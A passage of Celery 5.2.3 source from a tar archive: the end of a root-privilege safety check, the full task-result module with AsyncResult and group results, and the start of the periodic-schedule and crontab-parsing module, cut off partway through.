try: gid_entry = grp.getgrgid(gid) egid_entry = grp.getgrgid(egid) except KeyError: warnings.warn(SecurityWarning(ASSUMING_ROOT)) _warn_or_raise_security_error(egid, euid, gid, uid, pickle_or_serialize) return # Get the group and effective group name based on gid gid_grp_name = gid_entry[0] egid_grp_name = egid_entry[0] # Create lists to use in validation step later. gids_in_use = (gid_grp_name, egid_grp_name) groups_with_security_risk = ('sudo', 'wheel') is_root = uid == 0 or euid == 0 # Confirm that the gid and egid are not one that # can be used to escalate privileges. if is_root or any(group in gids_in_use for group in groups_with_security_risk): _warn_or_raise_security_error(egid, euid, gid, uid, pickle_or_serialize) def _warn_or_raise_security_error(egid, euid, gid, uid, pickle_or_serialize): c_force_root = os.environ.get('C_FORCE_ROOT', False) if pickle_or_serialize and not c_force_root: raise SecurityError(ROOT_DISALLOWED.format( uid=uid, euid=euid, gid=gid, egid=egid, )) warnings.warn(SecurityWarning(ROOT_DISCOURAGED.format( uid=uid, euid=euid, gid=gid, egid=egid, ))) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/result.py0000664000175000017500000010260300000000000016052 0ustar00asifasif00000000000000"""Task results/state and results for groups of tasks.""" import datetime import time from collections import deque from contextlib import contextmanager from weakref import proxy from kombu.utils.objects import cached_property from vine import Thenable, barrier, promise from . import current_app, states from ._state import _set_task_join_will_block, task_join_will_block from .app import app_or_default from .exceptions import ImproperlyConfigured, IncompleteStream, TimeoutError from .utils.graph import DependencyGraph, GraphFormatter from .utils.iso8601 import parse_iso8601 try: import tblib except ImportError: tblib = None __all__ = ( 'ResultBase', 'AsyncResult', 'ResultSet', 'GroupResult', 'EagerResult', 'result_from_tuple', ) E_WOULDBLOCK = """\ Never call result.get() within a task! See http://docs.celeryq.org/en/latest/userguide/tasks.html\ #task-synchronous-subtasks """ def assert_will_not_block(): if task_join_will_block(): raise RuntimeError(E_WOULDBLOCK) @contextmanager def allow_join_result(): reset_value = task_join_will_block() _set_task_join_will_block(False) try: yield finally: _set_task_join_will_block(reset_value) @contextmanager def denied_join_result(): reset_value = task_join_will_block() _set_task_join_will_block(True) try: yield finally: _set_task_join_will_block(reset_value) class ResultBase: """Base class for results.""" #: Parent result (if part of a chain) parent = None @Thenable.register class AsyncResult(ResultBase): """Query task state. Arguments: id (str): See :attr:`id`. backend (Backend): See :attr:`backend`. """ app = None #: Error raised for timeouts. TimeoutError = TimeoutError #: The task's UUID. id = None #: The task result backend to use. 
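# --- Illustrative sketch, not part of the original source. ---
# Typical AsyncResult usage: the instance is usually returned by delay()/
# apply_async(), but can also be rebuilt from a stored task id.  The broker/
# backend URLs and the task id below are placeholders.

from celery import Celery

app = Celery('proj', broker='amqp://', backend='rpc://')
result = app.AsyncResult('d9078da5-9915-40a0-bfa1-392c7bde42ed')
print(result.state)                       # e.g. 'PENDING' until the backend knows the task
# value = result.get(timeout=10)          # blocks; re-raises the task's exception by default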
backend = None def __init__(self, id, backend=None, task_name=None, # deprecated app=None, parent=None): if id is None: raise ValueError( f'AsyncResult requires valid id, not {type(id)}') self.app = app_or_default(app or self.app) self.id = id self.backend = backend or self.app.backend self.parent = parent self.on_ready = promise(self._on_fulfilled, weak=True) self._cache = None self._ignored = False @property def ignored(self): """If True, task result retrieval is disabled.""" if hasattr(self, '_ignored'): return self._ignored return False @ignored.setter def ignored(self, value): """Enable/disable task result retrieval.""" self._ignored = value def then(self, callback, on_error=None, weak=False): self.backend.add_pending_result(self, weak=weak) return self.on_ready.then(callback, on_error) def _on_fulfilled(self, result): self.backend.remove_pending_result(self) return result def as_tuple(self): parent = self.parent return (self.id, parent and parent.as_tuple()), None def as_list(self): """Return as a list of task IDs.""" results = [] parent = self.parent results.append(self.id) if parent is not None: results.extend(parent.as_list()) return results def forget(self): """Forget the result of this task and its parents.""" self._cache = None if self.parent: self.parent.forget() self.backend.forget(self.id) def revoke(self, connection=None, terminate=False, signal=None, wait=False, timeout=None): """Send revoke signal to all workers. Any worker receiving the task, or having reserved the task, *must* ignore it. Arguments: terminate (bool): Also terminate the process currently working on the task (if any). signal (str): Name of signal to send to process if terminate. Default is TERM. wait (bool): Wait for replies from workers. The ``timeout`` argument specifies the seconds to wait. Disabled by default. timeout (float): Time in seconds to wait for replies when ``wait`` is enabled. """ self.app.control.revoke(self.id, connection=connection, terminate=terminate, signal=signal, reply=wait, timeout=timeout) def get(self, timeout=None, propagate=True, interval=0.5, no_ack=True, follow_parents=True, callback=None, on_message=None, on_interval=None, disable_sync_subtasks=True, EXCEPTION_STATES=states.EXCEPTION_STATES, PROPAGATE_STATES=states.PROPAGATE_STATES): """Wait until task is ready, and return its result. Warning: Waiting for tasks within a task may lead to deadlocks. Please read :ref:`task-synchronous-subtasks`. Warning: Backends use resources to store and transmit results. To ensure that resources are released, you must eventually call :meth:`~@AsyncResult.get` or :meth:`~@AsyncResult.forget` on EVERY :class:`~@AsyncResult` instance returned after calling a task. Arguments: timeout (float): How long to wait, in seconds, before the operation times out. propagate (bool): Re-raise exception if the task failed. interval (float): Time to wait (in seconds) before retrying to retrieve the result. Note that this does not have any effect when using the RPC/redis result store backends, as they don't use polling. no_ack (bool): Enable amqp no ack (automatically acknowledge message). If this is :const:`False` then the message will **not be acked**. follow_parents (bool): Re-raise any exception raised by parent tasks. disable_sync_subtasks (bool): Disable tasks to wait for sub tasks this is the default configuration. CAUTION do not enable this unless you must. Raises: celery.exceptions.TimeoutError: if `timeout` isn't :const:`None` and the result does not arrive within `timeout` seconds. 
Exception: If the remote call raised an exception then that exception will be re-raised in the caller process. """ if self.ignored: return if disable_sync_subtasks: assert_will_not_block() _on_interval = promise() if follow_parents and propagate and self.parent: _on_interval = promise(self._maybe_reraise_parent_error, weak=True) self._maybe_reraise_parent_error() if on_interval: _on_interval.then(on_interval) if self._cache: if propagate: self.maybe_throw(callback=callback) return self.result self.backend.add_pending_result(self) return self.backend.wait_for_pending( self, timeout=timeout, interval=interval, on_interval=_on_interval, no_ack=no_ack, propagate=propagate, callback=callback, on_message=on_message, ) wait = get # deprecated alias to :meth:`get`. def _maybe_reraise_parent_error(self): for node in reversed(list(self._parents())): node.maybe_throw() def _parents(self): node = self.parent while node: yield node node = node.parent def collect(self, intermediate=False, **kwargs): """Collect results as they return. Iterator, like :meth:`get` will wait for the task to complete, but will also follow :class:`AsyncResult` and :class:`ResultSet` returned by the task, yielding ``(result, value)`` tuples for each result in the tree. An example would be having the following tasks: .. code-block:: python from celery import group from proj.celery import app @app.task(trail=True) def A(how_many): return group(B.s(i) for i in range(how_many))() @app.task(trail=True) def B(i): return pow2.delay(i) @app.task(trail=True) def pow2(i): return i ** 2 .. code-block:: pycon >>> from celery.result import ResultBase >>> from proj.tasks import A >>> result = A.delay(10) >>> [v for v in result.collect() ... if not isinstance(v, (ResultBase, tuple))] [0, 1, 4, 9, 16, 25, 36, 49, 64, 81] Note: The ``Task.trail`` option must be enabled so that the list of children is stored in ``result.children``. This is the default but enabled explicitly for illustration. Yields: Tuple[AsyncResult, Any]: tuples containing the result instance of the child task, and the return value of that task. """ for _, R in self.iterdeps(intermediate=intermediate): yield R, R.get(**kwargs) def get_leaf(self): value = None for _, R in self.iterdeps(): value = R.get() return value def iterdeps(self, intermediate=False): stack = deque([(None, self)]) while stack: parent, node = stack.popleft() yield parent, node if node.ready(): stack.extend((node, child) for child in node.children or []) else: if not intermediate: raise IncompleteStream() def ready(self): """Return :const:`True` if the task has executed. If the task is still running, pending, or is waiting for retry then :const:`False` is returned. 
""" return self.state in self.backend.READY_STATES def successful(self): """Return :const:`True` if the task executed successfully.""" return self.state == states.SUCCESS def failed(self): """Return :const:`True` if the task failed.""" return self.state == states.FAILURE def throw(self, *args, **kwargs): self.on_ready.throw(*args, **kwargs) def maybe_throw(self, propagate=True, callback=None): cache = self._get_task_meta() if self._cache is None else self._cache state, value, tb = ( cache['status'], cache['result'], cache.get('traceback')) if state in states.PROPAGATE_STATES and propagate: self.throw(value, self._to_remote_traceback(tb)) if callback is not None: callback(self.id, value) return value maybe_reraise = maybe_throw # XXX compat alias def _to_remote_traceback(self, tb): if tb and tblib is not None and self.app.conf.task_remote_tracebacks: return tblib.Traceback.from_string(tb).as_traceback() def build_graph(self, intermediate=False, formatter=None): graph = DependencyGraph( formatter=formatter or GraphFormatter(root=self.id, shape='oval'), ) for parent, node in self.iterdeps(intermediate=intermediate): graph.add_arc(node) if parent: graph.add_edge(parent, node) return graph def __str__(self): """`str(self) -> self.id`.""" return str(self.id) def __hash__(self): """`hash(self) -> hash(self.id)`.""" return hash(self.id) def __repr__(self): return f'<{type(self).__name__}: {self.id}>' def __eq__(self, other): if isinstance(other, AsyncResult): return other.id == self.id elif isinstance(other, str): return other == self.id return NotImplemented def __ne__(self, other): res = self.__eq__(other) return True if res is NotImplemented else not res def __copy__(self): return self.__class__( self.id, self.backend, None, self.app, self.parent, ) def __reduce__(self): return self.__class__, self.__reduce_args__() def __reduce_args__(self): return self.id, self.backend, None, None, self.parent def __del__(self): """Cancel pending operations when the instance is destroyed.""" if self.backend is not None: self.backend.remove_pending_result(self) @cached_property def graph(self): return self.build_graph() @property def supports_native_join(self): return self.backend.supports_native_join @property def children(self): return self._get_task_meta().get('children') def _maybe_set_cache(self, meta): if meta: state = meta['status'] if state in states.READY_STATES: d = self._set_cache(self.backend.meta_from_decoded(meta)) self.on_ready(self) return d return meta def _get_task_meta(self): if self._cache is None: return self._maybe_set_cache(self.backend.get_task_meta(self.id)) return self._cache def _iter_meta(self, **kwargs): return iter([self._get_task_meta()]) def _set_cache(self, d): children = d.get('children') if children: d['children'] = [ result_from_tuple(child, self.app) for child in children ] self._cache = d return d @property def result(self): """Task return value. Note: When the task has been executed, this contains the return value. If the task raised an exception, this will be the exception instance. """ return self._get_task_meta()['result'] info = result @property def traceback(self): """Get the traceback of a failed task.""" return self._get_task_meta().get('traceback') @property def state(self): """The tasks current state. Possible values includes: *PENDING* The task is waiting for execution. *STARTED* The task has been started. *RETRY* The task is to be retried, possibly because of failure. *FAILURE* The task raised an exception, or has exceeded the retry limit. 
The :attr:`result` attribute then contains the exception raised by the task. *SUCCESS* The task executed successfully. The :attr:`result` attribute then contains the tasks return value. """ return self._get_task_meta()['status'] status = state # XXX compat @property def task_id(self): """Compat. alias to :attr:`id`.""" return self.id @task_id.setter def task_id(self, id): self.id = id @property def name(self): return self._get_task_meta().get('name') @property def args(self): return self._get_task_meta().get('args') @property def kwargs(self): return self._get_task_meta().get('kwargs') @property def worker(self): return self._get_task_meta().get('worker') @property def date_done(self): """UTC date and time.""" date_done = self._get_task_meta().get('date_done') if date_done and not isinstance(date_done, datetime.datetime): return parse_iso8601(date_done) return date_done @property def retries(self): return self._get_task_meta().get('retries') @property def queue(self): return self._get_task_meta().get('queue') @Thenable.register class ResultSet(ResultBase): """A collection of results. Arguments: results (Sequence[AsyncResult]): List of result instances. """ _app = None #: List of results in in the set. results = None def __init__(self, results, app=None, ready_barrier=None, **kwargs): self._app = app self.results = results self.on_ready = promise(args=(proxy(self),)) self._on_full = ready_barrier or barrier(results) if self._on_full: self._on_full.then(promise(self._on_ready, weak=True)) def add(self, result): """Add :class:`AsyncResult` as a new member of the set. Does nothing if the result is already a member. """ if result not in self.results: self.results.append(result) if self._on_full: self._on_full.add(result) def _on_ready(self): if self.backend.is_async: self.on_ready() def remove(self, result): """Remove result from the set; it must be a member. Raises: KeyError: if the result isn't a member. """ if isinstance(result, str): result = self.app.AsyncResult(result) try: self.results.remove(result) except ValueError: raise KeyError(result) def discard(self, result): """Remove result from the set if it is a member. Does nothing if it's not a member. """ try: self.remove(result) except KeyError: pass def update(self, results): """Extend from iterable of results.""" self.results.extend(r for r in results if r not in self.results) def clear(self): """Remove all results from this set.""" self.results[:] = [] # don't create new list. def successful(self): """Return true if all tasks successful. Returns: bool: true if all of the tasks finished successfully (i.e. didn't raise an exception). """ return all(result.successful() for result in self.results) def failed(self): """Return true if any of the tasks failed. Returns: bool: true if one of the tasks failed. (i.e., raised an exception) """ return any(result.failed() for result in self.results) def maybe_throw(self, callback=None, propagate=True): for result in self.results: result.maybe_throw(callback=callback, propagate=propagate) maybe_reraise = maybe_throw # XXX compat alias. def waiting(self): """Return true if any of the tasks are incomplete. Returns: bool: true if one of the tasks are still waiting for execution. """ return any(not result.ready() for result in self.results) def ready(self): """Did all of the tasks complete? (either by success of failure). Returns: bool: true if all of the tasks have been executed. """ return all(result.ready() for result in self.results) def completed_count(self): """Task completion count. 
Returns: int: the number of tasks completed. """ return sum(int(result.successful()) for result in self.results) def forget(self): """Forget about (and possible remove the result of) all the tasks.""" for result in self.results: result.forget() def revoke(self, connection=None, terminate=False, signal=None, wait=False, timeout=None): """Send revoke signal to all workers for all tasks in the set. Arguments: terminate (bool): Also terminate the process currently working on the task (if any). signal (str): Name of signal to send to process if terminate. Default is TERM. wait (bool): Wait for replies from worker. The ``timeout`` argument specifies the number of seconds to wait. Disabled by default. timeout (float): Time in seconds to wait for replies when the ``wait`` argument is enabled. """ self.app.control.revoke([r.id for r in self.results], connection=connection, timeout=timeout, terminate=terminate, signal=signal, reply=wait) def __iter__(self): return iter(self.results) def __getitem__(self, index): """`res[i] -> res.results[i]`.""" return self.results[index] def get(self, timeout=None, propagate=True, interval=0.5, callback=None, no_ack=True, on_message=None, disable_sync_subtasks=True, on_interval=None): """See :meth:`join`. This is here for API compatibility with :class:`AsyncResult`, in addition it uses :meth:`join_native` if available for the current result backend. """ return (self.join_native if self.supports_native_join else self.join)( timeout=timeout, propagate=propagate, interval=interval, callback=callback, no_ack=no_ack, on_message=on_message, disable_sync_subtasks=disable_sync_subtasks, on_interval=on_interval, ) def join(self, timeout=None, propagate=True, interval=0.5, callback=None, no_ack=True, on_message=None, disable_sync_subtasks=True, on_interval=None): """Gather the results of all tasks as a list in order. Note: This can be an expensive operation for result store backends that must resort to polling (e.g., database). You should consider using :meth:`join_native` if your backend supports it. Warning: Waiting for tasks within a task may lead to deadlocks. Please see :ref:`task-synchronous-subtasks`. Arguments: timeout (float): The number of seconds to wait for results before the operation times out. propagate (bool): If any of the tasks raises an exception, the exception will be re-raised when this flag is set. interval (float): Time to wait (in seconds) before retrying to retrieve a result from the set. Note that this does not have any effect when using the amqp result store backend, as it does not use polling. callback (Callable): Optional callback to be called for every result received. Must have signature ``(task_id, value)`` No results will be returned by this function if a callback is specified. The order of results is also arbitrary when a callback is used. To get access to the result object for a particular id you'll have to generate an index first: ``index = {r.id: r for r in gres.results.values()}`` Or you can create new result objects on the fly: ``result = app.AsyncResult(task_id)`` (both will take advantage of the backend cache anyway). no_ack (bool): Automatic message acknowledgment (Note that if this is set to :const:`False` then the messages *will not be acknowledged*). disable_sync_subtasks (bool): Disable tasks to wait for sub tasks this is the default configuration. CAUTION do not enable this unless you must. Raises: celery.exceptions.TimeoutError: if ``timeout`` isn't :const:`None` and the operation takes longer than ``timeout`` seconds. 
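# --- Illustrative sketch, not part of the original source. ---
# join() gathers results in submission order; get() dispatches to
# join_native() automatically when the backend supports it.  The app setup
# and the ``add`` task below are hypothetical, and a running worker is
# required for the call to return.

from celery import Celery, group

app = Celery('proj', broker='redis://localhost', backend='redis://localhost')

@app.task
def add(x, y):
    return x + y

res = group(add.s(i, i) for i in range(5))()
print(res.join(timeout=10, propagate=True))   # -> [0, 2, 4, 6, 8]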
""" if disable_sync_subtasks: assert_will_not_block() time_start = time.monotonic() remaining = None if on_message is not None: raise ImproperlyConfigured( 'Backend does not support on_message callback') results = [] for result in self.results: remaining = None if timeout: remaining = timeout - (time.monotonic() - time_start) if remaining <= 0.0: raise TimeoutError('join operation timed out') value = result.get( timeout=remaining, propagate=propagate, interval=interval, no_ack=no_ack, on_interval=on_interval, disable_sync_subtasks=disable_sync_subtasks, ) if callback: callback(result.id, value) else: results.append(value) return results def then(self, callback, on_error=None, weak=False): return self.on_ready.then(callback, on_error) def iter_native(self, timeout=None, interval=0.5, no_ack=True, on_message=None, on_interval=None): """Backend optimized version of :meth:`iterate`. .. versionadded:: 2.2 Note that this does not support collecting the results for different task types using different backends. This is currently only supported by the amqp, Redis and cache result backends. """ return self.backend.iter_native( self, timeout=timeout, interval=interval, no_ack=no_ack, on_message=on_message, on_interval=on_interval, ) def join_native(self, timeout=None, propagate=True, interval=0.5, callback=None, no_ack=True, on_message=None, on_interval=None, disable_sync_subtasks=True): """Backend optimized version of :meth:`join`. .. versionadded:: 2.2 Note that this does not support collecting the results for different task types using different backends. This is currently only supported by the amqp, Redis and cache result backends. """ if disable_sync_subtasks: assert_will_not_block() order_index = None if callback else { result.id: i for i, result in enumerate(self.results) } acc = None if callback else [None for _ in range(len(self))] for task_id, meta in self.iter_native(timeout, interval, no_ack, on_message, on_interval): if isinstance(meta, list): value = [] for children_result in meta: value.append(children_result.get()) else: value = meta['result'] if propagate and meta['status'] in states.PROPAGATE_STATES: raise value if callback: callback(task_id, value) else: acc[order_index[task_id]] = value return acc def _iter_meta(self, **kwargs): return (meta for _, meta in self.backend.get_many( {r.id for r in self.results}, max_iterations=1, **kwargs )) def _failed_join_report(self): return (res for res in self.results if res.backend.is_cached(res.id) and res.state in states.PROPAGATE_STATES) def __len__(self): return len(self.results) def __eq__(self, other): if isinstance(other, ResultSet): return other.results == self.results return NotImplemented def __ne__(self, other): res = self.__eq__(other) return True if res is NotImplemented else not res def __repr__(self): return f'<{type(self).__name__}: [{", ".join(r.id for r in self.results)}]>' @property def supports_native_join(self): try: return self.results[0].supports_native_join except IndexError: pass @property def app(self): if self._app is None: self._app = (self.results[0].app if self.results else current_app._get_current_object()) return self._app @app.setter def app(self, app): self._app = app @property def backend(self): return self.app.backend if self.app else self.results[0].backend @Thenable.register class GroupResult(ResultSet): """Like :class:`ResultSet`, but with an associated id. This type is returned by :class:`~celery.group`. It enables inspection of the tasks state and return values as a single entity. 
Arguments: id (str): The id of the group. results (Sequence[AsyncResult]): List of result instances. parent (ResultBase): Parent result of this group. """ #: The UUID of the group. id = None #: List/iterator of results in the group results = None def __init__(self, id=None, results=None, parent=None, **kwargs): self.id = id self.parent = parent super().__init__(results, **kwargs) def _on_ready(self): self.backend.remove_pending_result(self) super()._on_ready() def save(self, backend=None): """Save group-result for later retrieval using :meth:`restore`. Example: >>> def save_and_restore(result): ... result.save() ... result = GroupResult.restore(result.id) """ return (backend or self.app.backend).save_group(self.id, self) def delete(self, backend=None): """Remove this result if it was previously saved.""" (backend or self.app.backend).delete_group(self.id) def __reduce__(self): return self.__class__, self.__reduce_args__() def __reduce_args__(self): return self.id, self.results def __bool__(self): return bool(self.id or self.results) __nonzero__ = __bool__ # Included for Py2 backwards compatibility def __eq__(self, other): if isinstance(other, GroupResult): return ( other.id == self.id and other.results == self.results and other.parent == self.parent ) elif isinstance(other, str): return other == self.id return NotImplemented def __ne__(self, other): res = self.__eq__(other) return True if res is NotImplemented else not res def __repr__(self): return f'<{type(self).__name__}: {self.id} [{", ".join(r.id for r in self.results)}]>' def __str__(self): """`str(self) -> self.id`.""" return str(self.id) def __hash__(self): """`hash(self) -> hash(self.id)`.""" return hash(self.id) def as_tuple(self): return ( (self.id, self.parent and self.parent.as_tuple()), [r.as_tuple() for r in self.results] ) @property def children(self): return self.results @classmethod def restore(cls, id, backend=None, app=None): """Restore previously saved group result.""" app = app or ( cls.app if not isinstance(cls.app, property) else current_app ) backend = backend or app.backend return backend.restore_group(id) @Thenable.register class EagerResult(AsyncResult): """Result that we know has already been executed.""" def __init__(self, id, ret_value, state, traceback=None): # pylint: disable=super-init-not-called # XXX should really not be inheriting from AsyncResult self.id = id self._result = ret_value self._state = state self._traceback = traceback self.on_ready = promise() self.on_ready(self) def then(self, callback, on_error=None, weak=False): return self.on_ready.then(callback, on_error) def _get_task_meta(self): return self._cache def __reduce__(self): return self.__class__, self.__reduce_args__() def __reduce_args__(self): return (self.id, self._result, self._state, self._traceback) def __copy__(self): cls, args = self.__reduce__() return cls(*args) def ready(self): return True def get(self, timeout=None, propagate=True, disable_sync_subtasks=True, **kwargs): if disable_sync_subtasks: assert_will_not_block() if self.successful(): return self.result elif self.state in states.PROPAGATE_STATES: if propagate: raise self.result if isinstance( self.result, Exception) else Exception(self.result) return self.result wait = get # XXX Compat (remove 5.0) def forget(self): pass def revoke(self, *args, **kwargs): self._state = states.REVOKED def __repr__(self): return f'' @property def _cache(self): return { 'task_id': self.id, 'result': self._result, 'status': self._state, 'traceback': self._traceback, } @property def 
result(self): """The tasks return value.""" return self._result @property def state(self): """The tasks state.""" return self._state status = state @property def traceback(self): """The traceback if the task failed.""" return self._traceback @property def supports_native_join(self): return False def result_from_tuple(r, app=None): """Deserialize result from tuple.""" # earlier backends may just pickle, so check if # result is already prepared. app = app_or_default(app) Result = app.AsyncResult if not isinstance(r, ResultBase): res, nodes = r id, parent = res if isinstance(res, (list, tuple)) else (res, None) if parent: parent = result_from_tuple(parent, app) if nodes is not None: return app.GroupResult( id, [result_from_tuple(child, app) for child in nodes], parent=parent, ) return Result(id, parent=parent) return r ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/schedules.py0000664000175000017500000007110300000000000016513 0ustar00asifasif00000000000000"""Schedules define the intervals at which periodic tasks run.""" import numbers import re from bisect import bisect, bisect_left from collections import namedtuple from collections.abc import Iterable from datetime import datetime, timedelta from kombu.utils.objects import cached_property from . import current_app from .utils.collections import AttributeDict from .utils.time import (ffwd, humanize_seconds, localize, maybe_make_aware, maybe_timedelta, remaining, timezone, weekday) __all__ = ( 'ParseException', 'schedule', 'crontab', 'crontab_parser', 'maybe_schedule', 'solar', ) schedstate = namedtuple('schedstate', ('is_due', 'next')) CRON_PATTERN_INVALID = """\ Invalid crontab pattern. Valid range is {min}-{max}. \ '{value}' was found.\ """ CRON_INVALID_TYPE = """\ Argument cronspec needs to be of any of the following types: \ int, str, or an iterable type. {type!r} was given.\ """ CRON_REPR = """\ \ """ SOLAR_INVALID_LATITUDE = """\ Argument latitude {lat} is invalid, must be between -90 and 90.\ """ SOLAR_INVALID_LONGITUDE = """\ Argument longitude {lon} is invalid, must be between -180 and 180.\ """ SOLAR_INVALID_EVENT = """\ Argument event "{event}" is invalid, must be one of {all_events}.\ """ def cronfield(s): return '*' if s is None else s class ParseException(Exception): """Raised by :class:`crontab_parser` when the input can't be parsed.""" class BaseSchedule: def __init__(self, nowfun=None, app=None): self.nowfun = nowfun self._app = app def now(self): return (self.nowfun or self.app.now)() def remaining_estimate(self, last_run_at): raise NotImplementedError() def is_due(self, last_run_at): raise NotImplementedError() def maybe_make_aware(self, dt): return maybe_make_aware(dt, self.tz) @property def app(self): return self._app or current_app._get_current_object() @app.setter def app(self, app): self._app = app @cached_property def tz(self): return self.app.timezone @cached_property def utc_enabled(self): return self.app.conf.enable_utc def to_local(self, dt): if not self.utc_enabled: return timezone.to_local_fallback(dt) return dt def __eq__(self, other): if isinstance(other, BaseSchedule): return other.nowfun == self.nowfun return NotImplemented class schedule(BaseSchedule): """Schedule for periodic task. Arguments: run_every (float, ~datetime.timedelta): Time interval. relative (bool): If set to True the run time will be rounded to the resolution of the interval. 
nowfun (Callable): Function returning the current date and time (:class:`~datetime.datetime`). app (Celery): Celery app instance. """ relative = False def __init__(self, run_every=None, relative=False, nowfun=None, app=None): self.run_every = maybe_timedelta(run_every) self.relative = relative super().__init__(nowfun=nowfun, app=app) def remaining_estimate(self, last_run_at): return remaining( self.maybe_make_aware(last_run_at), self.run_every, self.maybe_make_aware(self.now()), self.relative, ) def is_due(self, last_run_at): """Return tuple of ``(is_due, next_time_to_check)``. Notes: - next time to check is in seconds. - ``(True, 20)``, means the task should be run now, and the next time to check is in 20 seconds. - ``(False, 12.3)``, means the task is not due, but that the scheduler should check again in 12.3 seconds. The next time to check is used to save energy/CPU cycles, it does not need to be accurate but will influence the precision of your schedule. You must also keep in mind the value of :setting:`beat_max_loop_interval`, that decides the maximum number of seconds the scheduler can sleep between re-checking the periodic task intervals. So if you have a task that changes schedule at run-time then your next_run_at check will decide how long it will take before a change to the schedule takes effect. The max loop interval takes precedence over the next check at value returned. .. admonition:: Scheduler max interval variance The default max loop interval may vary for different schedulers. For the default scheduler the value is 5 minutes, but for example the :pypi:`django-celery-beat` database scheduler the value is 5 seconds. """ last_run_at = self.maybe_make_aware(last_run_at) rem_delta = self.remaining_estimate(last_run_at) remaining_s = max(rem_delta.total_seconds(), 0) if remaining_s == 0: return schedstate(is_due=True, next=self.seconds) return schedstate(is_due=False, next=remaining_s) def __repr__(self): return f'' def __eq__(self, other): if isinstance(other, schedule): return self.run_every == other.run_every return self.run_every == other def __ne__(self, other): return not self.__eq__(other) def __reduce__(self): return self.__class__, (self.run_every, self.relative, self.nowfun) @property def seconds(self): return max(self.run_every.total_seconds(), 0) @property def human_seconds(self): return humanize_seconds(self.seconds) class crontab_parser: """Parser for Crontab expressions. Any expression of the form 'groups' (see BNF grammar below) is accepted and expanded to a set of numbers. These numbers represent the units of time that the Crontab needs to run on: .. code-block:: bnf digit :: '0'..'9' dow :: 'a'..'z' number :: digit+ | dow+ steps :: number range :: number ( '-' number ) ? numspec :: '*' | range expr :: numspec ( '/' steps ) ? groups :: expr ( ',' expr ) * The parser is a general purpose one, useful for parsing hours, minutes and day of week expressions. Example usage: .. code-block:: pycon >>> minutes = crontab_parser(60).parse('*/15') [0, 15, 30, 45] >>> hours = crontab_parser(24).parse('*/4') [0, 4, 8, 12, 16, 20] >>> day_of_week = crontab_parser(7).parse('*') [0, 1, 2, 3, 4, 5, 6] It can also parse day of month and month of year expressions if initialized with a minimum of 1. Example usage: .. 
code-block:: pycon >>> days_of_month = crontab_parser(31, 1).parse('*/3') [1, 4, 7, 10, 13, 16, 19, 22, 25, 28, 31] >>> months_of_year = crontab_parser(12, 1).parse('*/2') [1, 3, 5, 7, 9, 11] >>> months_of_year = crontab_parser(12, 1).parse('2-12/2') [2, 4, 6, 8, 10, 12] The maximum possible expanded value returned is found by the formula: :math:`max_ + min_ - 1` """ ParseException = ParseException _range = r'(\w+?)-(\w+)' _steps = r'/(\w+)?' _star = r'\*' def __init__(self, max_=60, min_=0): self.max_ = max_ self.min_ = min_ self.pats = ( (re.compile(self._range + self._steps), self._range_steps), (re.compile(self._range), self._expand_range), (re.compile(self._star + self._steps), self._star_steps), (re.compile('^' + self._star + '$'), self._expand_star), ) def parse(self, spec): acc = set() for part in spec.split(','): if not part: raise self.ParseException('empty part') acc |= set(self._parse_part(part)) return acc def _parse_part(self, part): for regex, handler in self.pats: m = regex.match(part) if m: return handler(m.groups()) return self._expand_range((part,)) def _expand_range(self, toks): fr = self._expand_number(toks[0]) if len(toks) > 1: to = self._expand_number(toks[1]) if to < fr: # Wrap around max_ if necessary return (list(range(fr, self.min_ + self.max_)) + list(range(self.min_, to + 1))) return list(range(fr, to + 1)) return [fr] def _range_steps(self, toks): if len(toks) != 3 or not toks[2]: raise self.ParseException('empty filter') return self._expand_range(toks[:2])[::int(toks[2])] def _star_steps(self, toks): if not toks or not toks[0]: raise self.ParseException('empty filter') return self._expand_star()[::int(toks[0])] def _expand_star(self, *args): return list(range(self.min_, self.max_ + self.min_)) def _expand_number(self, s): if isinstance(s, str) and s[0] == '-': raise self.ParseException('negative numbers not supported') try: i = int(s) except ValueError: try: i = weekday(s) except KeyError: raise ValueError(f'Invalid weekday literal {s!r}.') max_val = self.min_ + self.max_ - 1 if i > max_val: raise ValueError( f'Invalid end range: {i} > {max_val}.') if i < self.min_: raise ValueError( f'Invalid beginning range: {i} < {self.min_}.') return i class crontab(BaseSchedule): """Crontab schedule. A Crontab can be used as the ``run_every`` value of a periodic task entry to add :manpage:`crontab(5)`-like scheduling. Like a :manpage:`cron(5)`-job, you can specify units of time of when you'd like the task to execute. It's a reasonably complete implementation of :command:`cron`'s features, so it should provide a fair degree of scheduling needs. You can specify a minute, an hour, a day of the week, a day of the month, and/or a month in the year in any of the following formats: .. attribute:: minute - A (list of) integers from 0-59 that represent the minutes of an hour of when execution should occur; or - A string representing a Crontab pattern. This may get pretty advanced, like ``minute='*/15'`` (for every quarter) or ``minute='1,13,30-45,50-59/2'``. .. attribute:: hour - A (list of) integers from 0-23 that represent the hours of a day of when execution should occur; or - A string representing a Crontab pattern. This may get pretty advanced, like ``hour='*/3'`` (for every three hours) or ``hour='0,8-17/2'`` (at midnight, and every two hours during office hours). .. attribute:: day_of_week - A (list of) integers from 0-6, where Sunday = 0 and Saturday = 6, that represent the days of a week that execution should occur. - A string representing a Crontab pattern. 
This may get pretty advanced, like ``day_of_week='mon-fri'`` (for weekdays only). (Beware that ``day_of_week='*/2'`` does not literally mean 'every two days', but 'every day that is divisible by two'!) .. attribute:: day_of_month - A (list of) integers from 1-31 that represents the days of the month that execution should occur. - A string representing a Crontab pattern. This may get pretty advanced, such as ``day_of_month='2-30/2'`` (for every even numbered day) or ``day_of_month='1-7,15-21'`` (for the first and third weeks of the month). .. attribute:: month_of_year - A (list of) integers from 1-12 that represents the months of the year during which execution can occur. - A string representing a Crontab pattern. This may get pretty advanced, such as ``month_of_year='*/3'`` (for the first month of every quarter) or ``month_of_year='2-12/2'`` (for every even numbered month). .. attribute:: nowfun Function returning the current date and time (:class:`~datetime.datetime`). .. attribute:: app The Celery app instance. It's important to realize that any day on which execution should occur must be represented by entries in all three of the day and month attributes. For example, if ``day_of_week`` is 0 and ``day_of_month`` is every seventh day, only months that begin on Sunday and are also in the ``month_of_year`` attribute will have execution events. Or, ``day_of_week`` is 1 and ``day_of_month`` is '1-7,15-21' means every first and third Monday of every month present in ``month_of_year``. """ def __init__(self, minute='*', hour='*', day_of_week='*', day_of_month='*', month_of_year='*', **kwargs): self._orig_minute = cronfield(minute) self._orig_hour = 